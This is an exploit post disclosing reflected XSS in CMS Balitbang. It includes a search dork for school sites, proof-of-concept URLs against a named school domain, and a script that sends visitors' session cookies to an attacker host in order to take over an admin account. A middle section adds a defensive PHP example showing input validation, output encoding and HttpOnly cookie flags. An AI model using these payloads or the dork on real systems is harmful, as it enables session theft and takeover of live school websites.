Bug XSS Di CMS Balitbang All Version


Hello injector friends.. this time we will share one more bug in websites built on CMS Balitbang... check it out...:D

# Exploit Title :: XSS bug in CMS Balitbang, all versions
# Date :: 2015-07-13
# Homepage :: https://divisidatalitbang.net
# Exploit Author :: Minato
# Dork :: site:sch.id or it can be developed further
==================
VULNERABLE CODE
==================
functions\fungsi_artikel.php:$kd=$_POST['kode'];
functions\agenda.php:$kode = $_GET['kode'];
functions\functions_download.php: $kode=$_GET['kode'];
functions\functions_mem.php:$kode=$_GET['kode'];
functions\fungsi_berita.php:$kd=$_GET['kode'];
and many others
# POC
http://www.sman11-smg.sch.id/html/index.php?id=artikel&kode=33'><script>alert(document.cookie)</script>
http://www.sman11-smg.sch.id/html/index.php?id=berita&kode=73'><script>alert(document.cookie)</script>
# XSS attack concept :: GET the PHPSESSID to become admin
<script>window.location="http://www.site-attacker.com/xss-stealer.php?cookie=document.cookie";</script>
http://www.sman11-smg.sch.id/html/index.php?id=berita&kode=73'><script>window.location="http://www.site-attacker.com/xss-stealer.php?cookie=document.cookie";</script>
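The root cause in the vulnerable code listing above is that `kode` is read straight from `$_GET`/`$_POST` and reflected into the page unencoded, and the attack concept relies on `document.cookie` exposing PHPSESSID. The PHP below is an added example written for this post, not code from CMS Balitbang: it places the vulnerable pattern beside a hardened version (integer validation of `kode` plus output encoding) and sets the session-cookie flags that stop script from reading the session id. The function names and the anchor-tag template are assumptions for illustration; the sample input is constructed from the proof-of-concept payload.

```php
<?php
// Added example, not CMS Balitbang code. Function names and the HTML
// template are assumptions used only to illustrate the fix.
declare(strict_types=1);

// 1. Session-cookie hardening; must run before session_start().
//    HttpOnly keeps document.cookie from exposing PHPSESSID to script,
//    Secure restricts the cookie to HTTPS, SameSite limits cross-site sends.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,   // assumes the site is served over HTTPS
    'samesite' => 'Lax',
]);
session_start();

// 2. The vulnerable pattern from the listing: raw input reflected into HTML.
function render_article_vulnerable(array $input): string
{
    $kode = $input['kode'];                       // no validation, no encoding
    return "<a href='index.php?id=artikel&kode=" . $kode . "'>Artikel</a>";
}

// 3. Hardened version. "kode" is a record id, so accept only a positive
//    integer; anything else is rejected before it reaches the template or a query.
function read_kode(array $input): ?int
{
    $kode = filter_var(
        $input['kode'] ?? '',
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    return $kode === false ? null : $kode;
}

// Encode for HTML text/attribute context. ENT_QUOTES also escapes the single
// quote that the proof-of-concept payload uses to break out of the attribute.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_article_hardened(array $input): string
{
    $kode = read_kode($input);
    if ($kode === null) {
        // Caller should answer with HTTP 400; only a fixed message is rendered.
        return '<p>Invalid article id.</p>';
    }
    return "<a href='index.php?id=artikel&kode=" . h((string) $kode) . "'>Artikel</a>";
}

// Constructed sample input mirroring the proof-of-concept payload above.
$sample = ['kode' => "33'><script>alert(document.cookie)</script>"];

echo render_article_vulnerable($sample), PHP_EOL;      // script tag lands in the page
echo render_article_hardened($sample), PHP_EOL;        // rejected as an invalid id
echo render_article_hardened(['kode' => '33']), PHP_EOL; // normal id renders encoded
```

`read_kode` works for both `$_GET` and `$_POST`, which covers every file in the listing (`fungsi_artikel.php` reads `kode` from POST, the others from GET). The cookie flags do not remove the XSS, they only take the session id out of reach of `document.cookie`; validation and encoding are the actual fix.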

Stay tuned for our next SQLi tricks...:D
